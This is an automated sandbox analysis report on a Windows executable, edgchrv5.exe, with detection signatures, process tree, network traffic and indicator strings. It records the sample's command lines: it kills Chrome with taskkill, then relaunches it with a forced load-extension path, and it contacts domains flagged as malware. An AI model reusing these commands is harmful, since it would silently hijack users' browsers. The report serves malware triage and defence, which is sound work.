Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
edgchrv5.exe

Overview

General Information

Sample Name:edgchrv5.exe
Analysis ID:886159
MD5:0c0a3d01c45f66056d607bbad486b39b
SHA1:d96aa9b9fe3a0515d70f3e909f00c865dfc5821c
SHA256:d158f3cfb47665928c5d304495fa99050a9e4c5b8d54332d400eec78bd7f98b6
Tags:exe
Infos:

Detection

Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
Machine Learning detection for sample
Modifies Chrome's extension installation force list
Creates a DirectInput object (often for capturing keystrokes)
Uses 32bit PE files
PE file contains an invalid checksum
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Uses taskkill to terminate processes
Contains functionality to dynamically determine API calls
Installs a Chrome extension
Creates a process in suspended mode (likely to inject code)
IP address seen in connection with other malware
Enables debug privileges

Classification

  • System is w10x64
  • edgchrv5.exe (PID: 5884 cmdline: C:\Users\user\Desktop\edgchrv5.exe MD5: 0C0A3D01C45F66056D607BBAD486B39B)
    • chrome.exe (PID: 1264 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" https://getfiles.wiki/welcome.php MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
      • chrome.exe (PID: 5244 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1816 --field-trial-handle=1612,i,1794324843492306011,10960809386793775335,131072 /prefetch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
    • taskkill.exe (PID: 7044 cmdline: /IM chrome.exe MD5: 15E2E0ACD891510C6268CB8899F2A1A1)
      • conhost.exe (PID: 7036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • chrome.exe (PID: 7216 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --no-startup-window --load-extension="C:\Users\user\AppData\Local\ServiceApp\apps-helper" --hide-crash-restore-bubble MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
      • chrome.exe (PID: 7832 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1952 --field-trial-handle=1728,i,13370300744351051505,8597988726894195581,131072 /prefetch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
    • taskkill.exe (PID: 7800 cmdline: /F /IM chrome.exe /T MD5: 15E2E0ACD891510C6268CB8899F2A1A1)
      • conhost.exe (PID: 7648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: edgchrv5.exeReversingLabs: Detection: 29%
Source: edgchrv5.exeVirustotal: Detection: 35%Perma Link
Source: https://getfiles.wiki/redirect.php?gjhagdjfbdjk=MTAyLjEyOS4xNDMuNzc=Avira URL Cloud: Label: malware
Source: https://getfiles.wiki/redirect.php?gjhagdjfbdjk=Avira URL Cloud: Label: malware
Source: https://getfiles.wiki/redirect.phpAvira URL Cloud: Label: malware
Source: https://getfiles.wiki/welcome.phpAvira URL Cloud: Label: malware
Source: edgchrv5.exeJoe Sandbox ML: detected
Source: edgchrv5.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: edgchrv5.exeStatic PE information: certificate valid
Source: edgchrv5.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\edgchrv5.exeCode function: 0_2_01001740 SHGetSpecialFolderPathW,GetFileAttributesW,RegOpenKeyExW,RegOpenKeyExW,RegOpenKeyExW,RegOpenKeyExW,RegOpenKeyExW,ShellExecuteW,Sleep,FindFirstFileW,GetFileAttributesW,FindNextFileW,Sleep,GetFileAttributesW,Sleep,Sleep,Sleep,FindNextFileW,FindClose,_memset,GetFileAttributesW,RegOpenKeyExW,RegOpenKeyExW,RegOpenKeyExW,RegOpenKeyExW,RegOpenKeyExW,ShellExecuteW,Sleep,FindFirstFileW,GetFileAttributesW,FindNextFileW,Sleep,Sleep,Sleep,0_2_01001740
Source: C:\Users\user\Desktop\edgchrv5.exeCode function: 0_2_01001F50 SHGetSpecialFolderPathW,_memset,FindFirstFileW,_memset,GetFileAttributesW,RegOpenKeyExW,RegDeleteValueW,RegCloseKey,RegOpenKeyExW,RegDeleteValueW,RegCloseKey,RegOpenKeyExW,RegDeleteKeyW,RegDeleteKeyW,RegCloseKey,RegOpenKeyExW,RegDeleteValueW,RegDeleteValueW,RegCloseKey,RegOpenKeyExW,RegDeleteKeyW,RegCloseKey,ShellExecuteW,Sleep,FindFirstFileW,GetFileAttributesW,GetFileAttributesW,FindNextFileW,0_2_01001F50
Source: C:\Users\user\Desktop\edgchrv5.exeCode function: 0_2_0100180C RegOpenKeyExW,RegDeleteValueW,RegCloseKey,RegOpenKeyExW,RegDeleteValueW,RegCloseKey,RegOpenKeyExW,RegDeleteKeyW,RegDeleteKeyW,RegCloseKey,RegOpenKeyExW,RegDeleteValueW,RegDeleteValueW,RegCloseKey,RegOpenKeyExW,RegDeleteKeyW,RegCloseKey,ShellExecuteW,Sleep,FindFirstFileW,GetFileAttributesW,GetFileAttributesW,FindNextFileW,0_2_0100180C
Source: Joe Sandbox ViewIP Address: 141.101.120.10 141.101.120.10
Source: Joe Sandbox ViewIP Address: 38.128.66.115 38.128.66.115
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 12 Jun 2023 17:07:05 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: script-src 'report-sample' 'nonce-OUKiuXTGfIwuxOWZhMdFvQ' 'unsafe-inline' 'unsafe-eval';object-src 'none';base-uri 'self';worker-src 'self';report-uri /webstore/cspreportContent-Security-Policy: require-trusted-types-for 'script';report-uri https://csp.withgoogle.com/csp/chromewebstore/2Report-To: {"group":"coop_chromewebstore","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/chromewebstore"}]}Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="coop_chromewebstore"Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffSet-Cookie: NID=511=O-41PZOM4JAM3O6mR84aHb-HJ-jhkNo9A_SU_tcUFwraceM8b7md4ZwaxRCSxgUzeWp1LDTBoywCojdX06a53Hjy_wzxWMkPy7y7icAKwm1K6JVsR4TrPpFgmtoaBUQ_1Pn_zAV4OOERT7LeniKI1zSAXY-itFT79HH5kFMsDuc; expires=Tue, 12-Dec-2023 17:07:05 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=noneAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 12 Jun 2023 17:07:12 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachevary: User-Agentx-turbo-charged-by: LiteSpeedCF-Cache-Status: BYPASSReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qDygGzpyVf%2FvXRZ8%2B8g7Doys1Hqvo9OGEGOztGaigdYFHOxl5%2BCHxGfDS%2FHsIBI%2FGtFnZCUdpiP6cmTWPUdk3BtIDngxQmeZkYkp%2B0JxsD05i5KWS9BqX9jj5M08v1L3"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7d63b04e5dc068f2-FRAalt-svc: h3=":443"; ma=86400
Source: edgchrv5.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: edgchrv5.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: edgchrv5.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: edgchrv5.exeString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: edgchrv5.exeString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
Source: edgchrv5.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: edgchrv5.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: edgchrv5.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: edgchrv5.exeString found in binary or memory: http://ocsp.digicert.com0A
Source: edgchrv5.exeString found in binary or memory: http://ocsp.digicert.com0C
Source: edgchrv5.exeString found in binary or memory: http://ocsp.digicert.com0X
Source: edgchrv5.exeString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: edgchrv5.exeString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
Source: edgchrv5.exeString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: edgchrv5.exeString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
Source: chromecache_131.4.drString found in binary or memory: https://api.ipify.org?format=jsonp&callback=getIP
Source: chromecache_132.4.drString found in binary or memory: https://campaignkeepy.buzz/
Source: chromecache_132.4.drString found in binary or memory: https://campaignkejfcv.buzz/
Source: chromecache_131.4.drString found in binary or memory: https://getfiles.wiki/redirect.php?gjhagdjfbdjk=
Source: edgchrv5.exe, edgchrv5.exe, 00000000.00000002.397704318.000000000144A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://getfiles.wiki/welcome.php
Source: edgchrv5.exe, 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://getfiles.wiki/welcome.php%s
Source: edgchrv5.exe, 00000000.00000002.397704318.0000000001485000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://getfiles.wiki/welcome.php&Svh&
Source: edgchrv5.exe, 00000000.00000002.397704318.000000000144A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://getfiles.wiki/welcome.phpFp1
Source: edgchrv5.exe, 00000000.00000002.397704318.0000000001485000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://getfiles.wiki/welcome.phpX
Source: edgchrv5.exe, 00000000.00000002.397704318.0000000001485000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://getfiles.wiki/welcome.php~
Source: chromecache_133.4.drString found in binary or memory: https://t.dtscout.com/pv/
Source: edgchrv5.exeString found in binary or memory: https://www.globalsign.com/repository/0
Source: unknownHTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1Host: accounts.google.comConnection: keep-aliveContent-Length: 1Origin: https://www.google.comContent-Type: application/x-www-form-urlencodedSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+904; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg
Source: unknownDNS traffic detected: queries for: getfiles.wiki
Source: global trafficHTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmiedaX-Goog-Update-Updater: chromecrx-104.0.5112.81Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /welcome.php HTTP/1.1Host: getfiles.wikiConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /webstore/inlineinstall/detail/ecffbknobglofafinobbcmaionnihcma HTTP/1.1Host: chrome.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /r.php?key=pvwarw3 HTTP/1.1Host: exturl.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /redirect.php HTTP/1.1Host: getfiles.wikiConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /?format=jsonp&callback=getIP HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://getfiles.wiki/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /redirect.php?gjhagdjfbdjk=MTAyLjEyOS4xNDMuNzc= HTTP/1.1Host: getfiles.wikiConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://getfiles.wiki/redirect.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /r.php?payout=OPTIONAL&cnv_id=OPTIONAL HTTP/1.1Host: campaignkeepy.buzzConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://getfiles.wiki/redirect.php?gjhagdjfbdjk=MTAyLjEyOS4xNDMuNzc=Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /r.php?payout=OPTIONAL&cnv_id=OPTIONAL HTTP/1.1Host: campaignkejfcv.buzzConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://getfiles.wiki/redirect.php?gjhagdjfbdjk=MTAyLjEyOS4xNDMuNzc=Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /stats/0.php?4708787&@f16&@g1&@h1&@i1&@j1686622029954&@k0&@l1&@m&@n0&@ohttps%3A%2F%2Fgetfiles.wiki%2Fredirect.php&@q0&@r0&@s0&@ten-US&@u1280&@b1:199562055&@b3:1686622030&@b4:js15_as.js&@b5:-420&@a-_0.2.1&@vhttps%3A%2F%2Fgetfiles.wiki%2Fredirect.php%3Fgjhagdjfbdjk%3DMTAyLjEyOS4xNDMuNzc%3D&@w HTTP/1.1Host: s4.histats.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://getfiles.wiki/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /e/?v=1a&pid=5200&site=1&l=https%3A%2F%2Fgetfiles.wiki%2Fredirect.php%3Fgjhagdjfbdjk%3DMTAyLjEyOS4xNDMuNzc%3D&j=https%3A%2F%2Fgetfiles.wiki%2Fredirect.php HTTP/1.1Host: e.dtscout.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://getfiles.wiki/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pv/?_a=v&_h=getfiles.wiki&_ss=ng6jfd0g1c&_pv=1&_ls=0&_u1=1&_u3=1&_cc=ch&_pl=d&_cbid=15t7&_cb=_dtspv.c HTTP/1.1Host: t.dtscout.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://getfiles.wiki/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: m=1; oa=1; df=1686589631
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: getfiles.wikiConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://getfiles.wiki/redirect.php?gjhagdjfbdjk=MTAyLjEyOS4xNDMuNzc=Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: HstCfa4708787=1686622029954; HstCla4708787=1686622029954; HstCmu4708787=1686622029954; HstPn4708787=1; HstPt4708787=1; HstCnv4708787=1; HstCns4708787=1
Source: edgchrv5.exe, 00000000.00000002.397704318.000000000144A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: edgchrv5.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\edgchrv5.exeCode function: 0_2_010071BD0_2_010071BD
Source: C:\Users\user\Desktop\edgchrv5.exeCode function: String function: 01002B10 appears 31 times
Source: edgchrv5.exeReversingLabs: Detection: 29%
Source: edgchrv5.exeVirustotal: Detection: 35%
Source: edgchrv5.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\edgchrv5.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\edgchrv5.exe C:\Users\user\Desktop\edgchrv5.exe
Source: C:\Users\user\Desktop\edgchrv5.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://getfiles.wiki/welcome.php
Source: C:\Users\user\Desktop\edgchrv5.exeProcess created: C:\Windows\SysWOW64\taskkill.exe /IM chrome.exe
Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1816 --field-trial-handle=1612,i,1794324843492306011,10960809386793775335,131072 /prefetch:8
Source: C:\Users\user\Desktop\edgchrv5.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --no-startup-window --load-extension="C:\Users\user\AppData\Local\ServiceApp\apps-helper" --hide-crash-restore-bubble
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1952 --field-trial-handle=1728,i,13370300744351051505,8597988726894195581,131072 /prefetch:8
Source: C:\Users\user\Desktop\edgchrv5.exeProcess created: C:\Windows\SysWOW64\taskkill.exe /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\edgchrv5.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://getfiles.wiki/welcome.phpJump to behavior
Source: C:\Users\user\Desktop\edgchrv5.exeProcess created: C:\Windows\SysWOW64\taskkill.exe /IM chrome.exeJump to behavior
Source: C:\Users\user\Desktop\edgchrv5.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --no-startup-window --load-extension="C:\Users\user\AppData\Local\ServiceApp\apps-helper" --hide-crash-restore-bubbleJump to behavior
Source: C:\Users\user\Desktop\edgchrv5.exeProcess created: C:\Windows\SysWOW64\taskkill.exe /F /IM chrome.exe /TJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1816 --field-trial-handle=1612,i,1794324843492306011,10960809386793775335,131072 /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
